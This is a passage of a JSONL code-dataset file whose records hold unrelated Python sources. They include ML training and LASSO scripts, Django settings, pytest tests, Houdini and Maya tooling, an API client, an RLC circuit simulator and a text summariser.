[Branch {:d}, Epochs {:d}--{:d}] Loss: {:.4f} Acc: {}\\n\\n\".format(\n net.get_ensemble_size() - current_branch_on_training,\n epoch + 1,\n max_training_epoch,\n val_loss[-1],\n np.array(val_corrects) / len(val_data)))\n\n # Add to history training and validation statistics\n history_loss.append(running_loss / running_updates)\n\n for i_4 in range(net.get_ensemble_size()):\n history_acc[i_4].append(running_corrects[i_4] / len(train_data))\n\n for b in range(net.get_ensemble_size()):\n history_val_loss[b].append(val_loss[b])\n history_val_acc[b].append(float(val_corrects[b]) / len(val_data))\n\n # Add ensemble accuracy to history\n history_val_acc[-1].append(float(val_corrects[-1]) / len(val_data))\n\n # Save best ensemble\n ensemble_acc = (float(val_corrects[-1]) / len(val_data))\n if ensemble_acc >= best_ensemble_acc:\n best_ensemble_acc = ensemble_acc\n best_ensemble = net.to_state_dict()\n\n # Save network\n Ensemble.save(best_ensemble,\n path.join(base_path_experiment, name_experiment, \"Saved Networks\"),\n current_branch_on_training)\n\n net.train()\n\n # Change branch on training\n if current_branch_on_training > 0:\n # Decrease max training epoch\n max_training_epoch = 2\n\n # Reload best configuration\n net.reload(best_ensemble)\n\n # Set optimizer\n optimizer = optim.SGD([{\"params\": net.base.parameters(), \"lr\": 0.02, \"momentum\": 0.9},\n {\"params\": net.branches[\n net.get_ensemble_size() - current_branch_on_training].parameters(),\n \"lr\": 0.1,\n \"momentum\": 0.9\n }])\n # Trained branches\n for b in range(net.get_ensemble_size()):\n if b != (net.get_ensemble_size() - current_branch_on_training):\n optimizer.add_param_group({\"params\": net.branches[b].parameters(), \"lr\": 0.02, \"momentum\": 0.9})\n\n # Change branch on training\n current_branch_on_training -= 1\n\n # Finish training after fine-tuning all branches\n else:\n break\n \n\n\nif __name__ == '__main__':\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"88544094","text":"# Django settings for poc project.\nimport os.path\nfrom os.path import abspath, dirname, join\nimport sys\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG\n\nROOT_DIR = abspath(join(dirname(__file__), os.path.pardir))\nPROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))\n\n##Add apps to sys.path\nsys.path.insert(1, os.path.join(ROOT_DIR, \"marketplaces\", \"apps\"))\nsys.path.insert(2, os.path.join(ROOT_DIR, \"stores\", \"apps\"))\nsys.path.insert(3, os.path.join(ROOT_DIR, \"libs\"))\nsys.path.insert(4, ROOT_DIR)\n\n\nADMINS = (\n)\n\nMANAGERS = ADMINS\n\nDATABASE_ENGINE = 'sqlite3' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\nDATABASE_NAME = os.path.join(PROJECT_ROOT, 'dev_poc.db') # Or path to database file if using sqlite3.\nDATABASE_USER = '' # Not used with sqlite3.\nDATABASE_PASSWORD = '' # Not used with sqlite3.\nDATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.\nDATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\n\nTIME_ZONE = 'US/Eastern'\n#TIME_ZONE = 'America/Buenos_Aires'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\nADMIN_MEDIA_PREFIX = '/media/admin/'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = ''\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n# 'django.template.loaders.eggs.load_template_source',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'auth.middleware.AuthenticationMiddleware',\n 'djangoflash.middleware.FlashMiddleware',\n 'market.middleware.MarketPlaceMiddleware'\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.core.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media', \n 'django.core.context_processors.request', \n 'djangoflash.context_processors.flash',\n 'market.context_processors.marketplace',\n 'core.context_processors.google_key', \n 'core.context_processors.secure_media',\n)\n\n\nROOT_URLCONF = 'marketplaces.urls'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n os.path.join(PROJECT_ROOT, \"templates/\"),\n #os.path.join(ROOT_DIR, \"stores\", \"templates/\"),\n)\n\nINSTALLED_APPS = (\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.admin', \n\n #third\n 'south',\n 'uni_form',\n 'haystack',\n\n #POC\n 'auth',\n 'auctions',\n 'blog_pages',\n 'core',\n 'lots', \n 'for_sale',\n 'market',\n 'market_import',\n 'market_buy',\n 'market_community',\n 'market_sell',\n 'reports',\n 'inventory',\n 'payments',\n 'preferences',\n 'reversion',\n 'sell',\n 'search',\n 'subscriptions',\n 'shops',\n 'themes',\n 'users'\n)\n\nAUTHENTICATION_BACKENDS = (\n #'django.contrib.auth.backends.ModelBackend',\n 'core.emailBackend.ModelBackend',\n)\n\nAUTH_PROFILE_MODULE = 'users.Profile'\n\nLOGIN_URL = '/buy/login/'\nLOGIN_REDIRECT_URL= '/redirect' \n\nGOOGLE_KEY = ''\n\nDEFAULT_DNS = ''\n\n\nEMAIL_HOST = \"\"\nEMAIL_PORT = 587\nEMAIL_HOST_USER = \"\"\nEMAIL_HOST_PASSWORD = \"\"\nEMAIL_USE_TLS = True\nEMAIL_FROM = ''\n\n# django-haystack settings\nHAYSTACK_SITECONF = \"search.indexes\"\nHAYSTACK_SEARCH_ENGINE = \"solr\"\n# url for solr core that will serve and index our project data\nHAYSTACK_SOLR_URL = \"http://127.0.0.1:8983/solr/poc\"\nHAYSTACK_SEARCH_RESULTS_PER_PAGE = 16\n\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG, format='[=%(levelname)s : %(asctime)s] %(message)s',)\n\n#import sys\n#logging.basicConfig(stream=sys.stdout)\n\nTHEMES_ROOT = join(ROOT_DIR, \"stores\", 'media', 'themes') + '/'\nDEFAULT_THEME = 'default.zip'\nSITE_RUNNING_MODE='marketplaces'\n\n#Testing\nSOUTH_TESTS_MIGRATE = False\n\ntry:\n from local_settings import *\nexcept ImportError:\n pass\n","sub_path":"marketplaces/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"60449844","text":"######################################################################################################################################################################\n# This script is designed to take all of the output prediction files created from LASSO2 and knit them back together into an array with the same shape as y_val\n######################################################################################################################################################################\n\nfrom __future__ import division\nimport numpy as np\nimport time\nimport pandas as pd\nimport glob as glob\nimport os\nimport argparse\n\n######################################################################################################################################################################\n\n# Hard code some paths\nfp_data = '/mnt/research/compbio/krishnanlab/data/rnaseq/archs4/human_TPM/' # Private data, working to establish a iris dataset so others can work on it.\nfp = 'results/' # I recommend replacing this path with one in a scratch directory\n\n######################################################################################################################################################################\n\nval = np.arcsinh(np.load(fp_data + 'GPL570subset_ValExp.npy'))\ntest = np.arcsinh(np.load(fp_data + 'GPL570subset_TstExp.npy'))\ny_gene_idx = np.loadtxt(fp_data + 'GPL570subset_LINCS_ygenes_inds.txt',dtype=int)\ny_val = np.transpose(val[:,y_gene_idx])\ntrim = np.load(fp_data + 'trimmed_down_val_set_inds.npy')\ny_val = y_val[:,trim]\ny_test = np.transpose(test[:,y_gene_idx])\nevals = ['val','test']\nprint(np.shape(y_val))\nprint(np.shape(y_test))\nparser = argparse.ArgumentParser()\nparser.add_argument('-alpha', type = float,\n help = 'alpha used during LASSO regression')\nparser.add_argument('-date',type = str,\n help = 'Date of save path')\nparser.add_argument('-split',type = str,\n help = 'Date of save path')\nargs = parser.parse_args()\nalpha = args.alpha\ndate = args.date\nsplit = args.split\nif split == 'val':\n\tevals = ['val']\nelif split == 'test':\n\tevals = ['test']\nelif split == 'both':\n\tevals = ['val','test']\nfor eval in evals:\n if eval == 'val':\n missing = [] \n start_model = 0\n last_model = np.shape(y_val)[1]\n y_pred_val = [] \n print(last_model)\n for model in range(start_model,last_model,1): \n if os.path.isfile(fp + date + '/y_pred_trimmed_LINCS_%s_model_%i_alpha_%f_sample_Lasso.npy'%(eval,model,alpha)): \n file_ = np.load(fp + date + '/y_pred_trimmed_LINCS_%s_model_%i_alpha_%f_sample_Lasso.npy'%(eval,model,alpha))\n y_pred_val.append(file_) \n else: \n missing.append(model) \n continue \n print(np.shape(y_pred_val))\n np.save(fp + date + '/y_pred_trimmed_%s_alpha_%f_LINCS_sample_lasso.npy'%(eval,alpha),y_pred_val)\n np.save(fp + date + '/%f_trimmed_%s_LINCS_missing.npy'%(alpha,eval),missing)\n print(np.shape(missing))\n print('trimmed_missing', np.shape(missing))\n elif eval == 'test':\n missing = [] \n start_model = 0\n last_model = np.shape(y_test)[1]\n y_pred_test = [] \n for model in range(start_model,last_model,1): \n if os.path.isfile(fp + date + '/y_pred_%s_model_%i_alpha_%f_sample_Lasso.npy'%(eval,model,alpha)): \n file_ = np.load(fp + date + '/y_pred_%s_model_%i_alpha_%f_sample_Lasso.npy'%(eval,model,alpha)) \n y_pred_test.append(file_) \n else: \n missing.append(model) \n continue \n np.save(fp + date + '/y_pred_%s_alpha_%f_sample_lasso.npy'%(eval,alpha),y_pred_test)\n np.save(fp + date + '/%s_missing.npy'%eval,missing)\n else:\n print('Error occurred')\n\n","sub_path":"trimmed_LINCS_knitting_ypreds2.py","file_name":"trimmed_LINCS_knitting_ypreds2.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"296964528","text":"import os\nfrom fnmatch import fnmatch\n\nlist = []\nroot = '/media/sammer/Seagate Backup Plus Drive/activitNet/segments/frames-stable-many'\npattern = \"*.jpg\"\n\nfor path, subdirs, files in os.walk(root):\n for name in sorted(files):\n if fnmatch(name, pattern):\n list.append(os.path.join(path, name))\n\nthefile = open('../data/list.txt','w')\n\nfor item in list:\n thefile.write(\"%s\\n\" % item)\n\nthefile.close()","sub_path":"extra/get_all_filenames.py","file_name":"get_all_filenames.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"4542754","text":"\"\"\"Tests for the Amount field\"\"\"\n\nfrom decimal import Decimal\n\nimport pytest\n\nfrom swissdta.fields import Amount\nfrom swissdta.records.record import DTARecord\n\nFIELD_LENGTH = 8\n\n\nclass ARecord(DTARecord):\n \"\"\"Subclass of DTARecord for testing the Numeric field\"\"\"\n field = Amount(length=FIELD_LENGTH)\n\n\n@pytest.mark.parametrize(('value', 'expected_value'), (\n (Decimal('1_4_3'), '143, '),\n (Decimal('14_00_0'), '14000, '),\n (Decimal(0b11), '3, '),\n (Decimal(0B11), '3, '),\n (Decimal(0b11_11), '15, '),\n (Decimal(0B11_1), '7, '),\n (Decimal(0o17), '15, '),\n (Decimal(0O31), '25, '),\n (Decimal(0o10_42), '546, '),\n (Decimal(0O23_5), '157, '),\n (Decimal(0xAF), '175, '),\n (Decimal(0Xa3), '163, '),\n (Decimal(0xf4_4c), '62540, '),\n (Decimal(0Xfb_1), '4017, '),\n (Decimal('5.34'), '5,34 ')\n))\ndef test_format_values(value, expected_value):\n record = ARecord()\n record.field = value\n assert record.field == expected_value\n assert not record.validation_warnings\n assert not record.validation_errors\n\n\n@pytest.mark.parametrize(('value', 'expected_errors'), (\n (Decimal('5'), tuple()),\n (Decimal('5.'), tuple()),\n (Decimal('-5'), (\"[field] INVALID: May not be negative\",)),\n (Decimal('-5.'), (\"[field] INVALID: May not be negative\",)),\n (Decimal('0'), (\"[field] INVALID: May not be zero\",)),\n (Decimal('0.'), (\"[field] INVALID: May not be zero\",))\n))\ndef test_invalid_values(value, expected_errors):\n \"\"\"Verify that non positive values are detected\"\"\"\n record = ARecord()\n record.field = value\n assert not record.validation_warnings\n assert record.validation_errors == expected_errors\n","sub_path":"tests/test_field_amount.py","file_name":"test_field_amount.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"497301434","text":"#!/usr/bin/env hython\n\nimport os\nfrom optparse import OptionParser\nimport parsers.hbatch\n\nparser = OptionParser(usage=\"usage: %prog [options] hip_name rop_name\", version=\"%prog 1.0\")\nparser.add_option(\"-s\", \"--start\", dest=\"start\", type=\"int\", help=\"start frame number\")\nparser.add_option(\"-e\", \"--end\", dest=\"end\", type=\"int\", help=\"end frame number\")\nparser.add_option(\"-t\", \"--take\", dest=\"take\", type=\"string\", help=\"take name\")\nparser.add_option(\"-c\", \"--slice\", dest=\"slice\", type=\"int\", help=\"slice number\")\n\n(options, args) = parser.parse_args()\n\nif len(args) < 2:\n parser.error( \"At least one of mandatory rop_name or hip_name argument is missed.\")\nelif len(args) > 2:\n parser.error( \"Too many arguments provided.\")\nelse:\n hip = args[0]\n rop = args[1]\n\nstart = options.start\nend = options.end\ntake = options.take\nslice = options.slice\n\nhou.hipFile.load(hip,True)\n\n# Establish ROP to be used\nif rop[0] != \"/\":\n rop = \"/out/\" + rop\nropnode = hou.node( rop)\nif ropnode == None:\n raise hou.InvalidNodeName( rop + \" rop node wasn't found\")\n\n# Trying to set ROP to output progress\ndrivertypename = ropnode.type().name()\n\nif take != None and len(take) > 0:\n hou.hscript(\"takeset \" + take)\n\n# If end wasn't specified, render single frame\nif end == None:\n end = start\n\nos.putenv(\"AF_SLICE\", str(slice))\nos.putenv(\"AF_TRPORT\", str(18000))\nos.putenv(\"AF_TRADDRESS\", 'localhost')\n\nropnode.render((start,end))\n#while frame <= end:\n# print parsers.hbatch.keyframe + str(frame)\n# sys.stdout.flush()\n# frame += by\n\n","sub_path":"plugins/houdini/sim_slice.py","file_name":"sim_slice.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"50380329","text":"import sys\nimport json\n \ndef __make_notes_scv(item):\n q = item['question']['fen']\n qc = item['question']['comment']\n a = item['answer']['fen']\n ac = item['answer']['comment']\n return \"[fen]\" + q + \"[/fen]\" + '\\t' + qc + '\\t' + \"[fen]\" + a + \"[/fen]\" + '\\t' + ac\n\ndef query_csv(data): \n return list(map(__make_notes_scv, data['deck_items']))\n\nif len(sys.argv) != 2:\n print(\"Usage: lichess2anki.py lichess-card.json\")\nelse:\n with open(sys.argv[1]) as fobj:\n data = json.load(fobj) \n csv_items = query_csv(data)\n with open('somefile.txt', 'a') as the_file:\n for csv_item in csv_items:\n the_file.write(csv_item + '\\n')\n \n \n","sub_path":"lichess2anki.py","file_name":"lichess2anki.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"490907177","text":"# Copyright (C) Animal Logic Pty Ltd. All rights reserved.\nimport logging\nfrom PySide2 import QtWidgets, QtCore\nfrom functools import partial\n\nfrom validateRig import insideDCC as vr_insideDCC\nfrom validateRig.const import serialization as c_serialization\nfrom validateRig.core import validator as c_validator\nfrom validateRig.core import nodes as c_nodes\nfrom validateRig.core import parser as c_parser\nfrom validateRig.core import factory as c_factory\nfrom validateRig.core.nodes import SourceNode, DefaultValueNode, ConnectionValidityNode\nfrom validateRig.uiElements.dialogs import (\n validityNodeWidgets as uied_validityNodeWidgets,\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef createValidator(name, data=None):\n # type: (str, dict) -> c_validator.Validator\n\n validator = c_factory.createValidator(name=name, data=data)\n return validator\n\n\ndef createSourceNode(name, longName, validityNodes=None):\n # type: (str, str, list[DefaultValueNode, ConnectionValidityNode]) -> None\n \"\"\"\n :param validityNodes: `list` of either DefaultValueNodes or ConnectionValidityNodes\n \"\"\"\n node = SourceNode(name=name, longName=longName, validityNodes=validityNodes)\n return node\n\n\ndef createDefaultValueNode(name, longName):\n # type: (str, str, any) -> None\n node = DefaultValueNode(name=name, longName=longName)\n return node\n\n\ndef createConnectionValidityNode(name, longName):\n # type: (str, str) -> ConnectionValidityNode\n\n node = ConnectionValidityNode(name=name, longName=longName)\n return node\n\n\ndef saveValidatorsToFile(validators, filepath):\n # type: (list, str) -> bool\n validatorDataList = list()\n for eachValidator in validators:\n validatorDataList.append(eachValidator.toData())\n\n c_parser.write(filepath=filepath, data=validatorDataList)\n\n return filepath\n\n\ndef updateNodeValuesFromDCC(node):\n # type: (c_nodes.Node) -> bool\n nodeType = node.nodeType\n if vr_insideDCC.insideMaya():\n from validateRig.core.maya import plugs as vrcm_plugs\n\n if nodeType == c_serialization.NT_DEFAULTVALUE:\n logger.debug(\"Updating defaultValueNode value from Maya\")\n data = node.defaultValueData\n attrName = data.keys()[0]\n mPlug = vrcm_plugs.getMPlugFromLongName(node.longName, attrName)\n value = vrcm_plugs.getMPlugValue(mPlug)\n logger.debug(\"MayaName: %s MayaValue: %s\" % (mPlug.name(), value))\n newData = {attrName: value}\n\n node.defaultValueData = newData\n\n elif nodeType == c_serialization.NT_CONNECTIONVALIDITY:\n logger.debug(\"Updating connectionNode value from Maya\")\n data = node.connectionData\n srcData = data.get(\"srcData\", list())\n srcPlugData = srcData.get(\"plugData\", list())\n srcNodeName = node.parent.longName\n srcMPlug = vrcm_plugs.fetchMPlugFromConnectionData(srcNodeName, srcPlugData)\n srcValue = vrcm_plugs.getMPlugValue(srcMPlug)\n logger.debug(\"MayaName: %s MayaValue: %s\" % (srcMPlug.name(), srcValue))\n srcData[\"attrValue\"] = srcValue\n\n destData = data.get(\"destData\", list())\n destPlugData = destData.get(\"plugData\", list())\n destNodeName = node.longName\n destMPlug = vrcm_plugs.fetchMPlugFromConnectionData(\n destNodeName, destPlugData\n )\n destValue = vrcm_plugs.getMPlugValue(destMPlug)\n logger.debug(\"MayaName: %s MayaValue: %s\" % (destMPlug.name(), destValue))\n destData[\"attrValue\"] = destValue\n\n node.connectionData = data\n\n return False\n\n\ndef getNSFromSelectedInDCC(nameSpaceInput):\n \"\"\" App sends signal to this to get the namespace from the DCC \"\"\"\n if vr_insideDCC.insideMaya():\n from maya import cmds\n\n # Smelly find of NS from : in name.\n firstSelected = cmds.ls(sl=True)[0]\n if \":\" in firstSelected:\n ns = cmds.ls(sl=True)[0].split(\":\")[0]\n logger.debug(\"NS in DCC: %s\" % ns)\n nameSpaceInput.setText(ns)\n\n\ndef selectNodesInDCC(nodeNames, event):\n # type: (list[str], QEvent) -> None\n\n for eachNode in nodeNames:\n if vr_insideDCC.insideMaya():\n from maya import cmds\n\n modifier = event.modifiers()\n if modifier == QtCore.Qt.ControlModifier:\n cmds.select(eachNode, add=True)\n else:\n cmds.select(eachNode, r=True)\n\n\ndef processValidationTreeWidgetDropEvent(nodeNames, validator, parent=None):\n # type: (list[str], c_validator.Validator, QtWidgets.QWidget) -> uid_attributeList.MultiSourceNodeListWidgets\n\n attrWidget = uied_validityNodeWidgets.MultiSourceNodeListWidgets(\"SourceNodes\", parent)\n\n # Check to see if this exists in the validator we dropped over.\n for longNodeName in nodeNames:\n srcNodesWidget = None\n if vr_insideDCC.insideMaya():\n from validateRig.core.maya import (validityNodeListWidget as vrcm_validityNodeListWidget,)\n import maya.cmds as cmds\n\n longLongNodeName = cmds.ls(longNodeName, l=True)\n if longLongNodeName:\n longLongNodeName = longLongNodeName[0]\n else:\n logger.error(\"Can't find node in scene: %s\" % longNodeName)\n continue\n logger.debug(\"longNodeName: %s\" % longNodeName)\n logger.debug(\"longLongNodeName: %s\" % longLongNodeName)\n\n existingSourceNode = None\n if validator().sourceNodeLongNameExists(longLongNodeName):\n existingSourceNode = validator().findSourceNodeByLongName(longLongNodeName)\n\n if existingSourceNode is None:\n srcNodesWidget = vrcm_validityNodeListWidget.MayaValidityNodesSelector(longNodeName=longLongNodeName,\n parent=None)\n else:\n srcNodesWidget = vrcm_validityNodeListWidget.MayaValidityNodesSelector.fromSourceNode(sourceNode=existingSourceNode,\n parent=None)\n\n if srcNodesWidget is None:\n continue\n\n attrWidget.addListWidget(srcNodesWidget)\n #attrWidget.sourceNodesAccepted.connect(partial(validator().addSourceNodes, force=True))\n\n return attrWidget\n","sub_path":"api/vrigCoreApi.py","file_name":"vrigCoreApi.py","file_ext":"py","file_size_in_byte":6437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"172838858","text":"# encoding:utf-8\nimport requests\nfrom time import time, sleep\nimport luiza_challenge.settings as settings\n\nclass LuizaApi(object):\n \"\"\"\n Handles the requests to the LuizaLabs' Challenge API, using exponential\n backoff to retry failed requests and also handles the limit of requests\n per second\n \"\"\"\n BASE_URL = \"http://challenge-api.luizalabs.com/api\"\n\n def __init__(self):\n \"\"\"\n Constructor.\n \"\"\"\n\n # request_times is a queue that stores the times of the latest\n # requests made, in order to avoid blowing the req-per-sec limit\n self.request_times = [0] * settings.MAX_REQUESTS_PER_SECOND\n\n def send_request(self, path, parameters=None, attempts=0):\n \"\"\"\n Sends a request to the Challenge API. If the requests fail for a reason\n other than 'Not found' (404), this method is recursively invoked again\n using exponential backoff .\n\n path: the path of the endpoint, not including the API's base URL\n parameters: a dict with the GET parameters for the request (optional)\n attempts: how many times this request has been tried and failed so far\n\n Returns: the request's Response object\n Raises: Exception, if all attempts at the request fail\n \"\"\"\n\n # If too many requests have been made in a short time, wait a bit\n now = time()\n request_interval = now - self.request_times[0]\n if request_interval < 1.0:\n sleep(1.0 - request_interval + settings.REQUESTS_PER_SECOND_SAFE_MARGIN)\n self.request_times = self.request_times[1:] + [now]\n\n # Performs the request\n response = requests.get(self.BASE_URL + path, params=parameters)\n\n # If the request failed, waits and performs the request again until\n # the request succeeds or the maximum number of retries is exceeded\n if response.ok is False and response.status_code != 404:\n if attempts == settings.MAX_REQUEST_RETRIES:\n raise Exception('Could not perform request: {} ({})'.\\\n format(response.reason, response.status_code))\n\n sleep(settings.EXPONENTIAL_BACKOFF_BASE ** attempts)\n response = self.send_request(path, parameters, attempts + 1)\n\n return response\n","sub_path":"luiza_challenge/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"7139228","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 9 21:07:46 2014\n\n@author: alejandro\n\"\"\"\n\nimport numpy as np\n\nclass RLCcircuit:\n \n def __init__(self, R, L, C, i, q): # characteristics of the RLC circuit\n self.R = R\n self.L = L\n self.C = C\n self.i = i\n self.q = q\n \n def simulation_voscillating(self, Av, fv, tfin): # simulates an RLC \n # circuit given an oscillating voltage input\n deltat = 0.001\n n = int(tfin/deltat+1)\n iqvt = np.zeros(shape = (4, n), dtype = float)\n iqvt[0, 0] = self.i\n iqvt[1, 0] = self.q\n for i in range(1, n):\n iqvt[2, i] = Av*np.sin(2*np.pi*fv*i*deltat)\n iqvt[0, i] = (deltat/self.L)*(iqvt[2, i] - iqvt[1, i-1]/self.C - self.R*iqvt[0, i-1]) + iqvt[0, i-1]\n iqvt[1, i] = iqvt[0, i-1]*deltat + iqvt[1, i-1]\n iqvt[3, i] = iqvt[3, i-1] + deltat\n return iqvt\n self.i = iqvt[0, n-1]\n self.q = iqvt[1, n-1]\n \n def simulation_vsteady(self, V, tfin): # simulates an RLC circuit given a\n # steady voltage input\n deltat = 0.001\n n = int(tfin/deltat+1)\n iqvt = np.zeros(shape = (4, n), dtype = float)\n iqvt[0, 0] = self.i\n iqvt[1, 0] = self.q\n iqvt[2, :] = V\n for i in range(1, n):\n iqvt[0, i] = (deltat/self.L)*(V - iqvt[1, i-1]/self.C - self.R*iqvt[0, i-1]) + iqvt[0, i-1]\n iqvt[1, i] = iqvt[0, i-1]*deltat + iqvt[1, i-1]\n iqvt[3, i] = iqvt[3, i-1] + deltat\n return iqvt\n self.i = iqvt[0, n-1]\n self.q = iqvt[1, n-1]\n \n # Both methods have as an output a matrix with the current intensity,\n # capacitor charge and input voltage with respect to the instant of time","sub_path":"RLC.py","file_name":"RLC.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"100317776","text":"# textsumExample to get a feel for text summerization\n# importing libraries for text summerization\nimport io\nimport json\nfrom pandas.io.json import json_normalize\nimport numpy as np\nimport pandas as pd\nimport nltk\nimport re\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import sent_tokenize\nimport networkx as nx\nimport math\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom gensim.summarization.summarizer import summarize\n# function to remove these stopwords from our dataset\ndef remove_stopwords(sen):\n sen_new = \" \".join([i for i in sen if i not in stop_words])\n return sen_new\n\n# Extract word vectors\n# using pre-trained Wikipedia 2014 + Gigaword 5 GloVe vectors\n# you can download it @ https://nlp.stanford.edu/data/glove.6B.zip\n\ndef get_rank(myList = [],*args):\n textrank = ''\n for i in range(math.ceil(len(ranked_sentences)/3)):\n textrank += (ranked_sentences[i][1])\n return textrank\n\nword_embeddings = {}\nf = open('glove.6B.100d.txt', encoding='utf-8')\nfor line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n word_embeddings[word] = coefs\nf.close()\n\n# create dataframe for article to munipulate\ndf = pd.read_json(\"update.json\")\nwith open('update.json',encoding=\"utf8\") as data_file:\n data = json.load(data_file)\n\n#normalize df\ndf_fields = pd.json_normalize(data,max_level=1)\n\nfor z in range(len(df)):\n sumtext = df_fields['fields.description'][z]\n\n sentences = []\n #for s in df_fields['fields.description']:\n sentences.append(sent_tokenize(df_fields['fields.description'][z]))\n\n sentences = [y for x in sentences for y in x] # flatten list\n\n # remove punctuations, numbers and special characters\n clean_sentences = pd.Series(sentences).str.replace(\"[^a-zA-Z]\", \" \")\n\n # make alphabets lowercase\n clean_sentences = [s.lower() for s in clean_sentences]\n\n stop_words = stopwords.words('english')\n\n # create vectors for our sentences\n sentence_vectors = []\n for i in clean_sentences:\n if len(i) != 0:\n v = sum([word_embeddings.get(w, np.zeros((100,))) for w in i.split()])/(len(i.split())+0.001)\n else:\n v = np.zeros((100,))\n sentence_vectors.append(v)\n\n # similarity matrix\n sim_mat = np.zeros([len(sentences), len(sentences)])\n\n # initialize the matrix with cosine similarity scores.\n for i in range(len(sentences)):\n for j in range(len(sentences)):\n if i != j:\n sim_mat[i][j] = cosine_similarity(sentence_vectors[i].reshape(1,100), sentence_vectors[j].reshape(1,100))[0,0]\n\n nx_graph = nx.from_numpy_array(sim_mat)\n scores = nx.pagerank(nx_graph)\n\n #Summary Extraction\n ranked_sentences = ''\n ranked_sentences = sorted(((scores[i],s) for i,s in enumerate(sentences)), reverse=True)\n text = get_rank(ranked_sentences)\n t = summarize(text,ratio=0.15)\n if (t == ''):\n df.fields[z]['description'] = text\n else:\n df.fields[z]['description'] = t\n \n\nx={}\nfor i in range(len(df)):\n temp={}\n temp[\"model\"] = \"jobs.jobsinfo\"\n temp[\"pk\"]= i\n x[i]=temp\n x[i][\"fields\"]={\n \"JobTitle\":(df.fields[i]['JobTitle']),\n \"organization\":(df.fields[i]['organization']),\n \"description\": df.fields[i]['description'],\n \"salary\":(df.fields[i]['salary']),\n \"place\":df.fields[i]['place'],\n \"link\":df.fields[i]['link'],\n \"site\":df.fields[i]['site']}\nx=list(x.values())\n\nwith io.open('update_summary.json', 'w',encoding='windows-1252') as fp:\n json.dump(x,fp)\n#Note: My django did not like indents so I got rid of them\n","sub_path":"web_django/src/textsum.py","file_name":"textsum.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
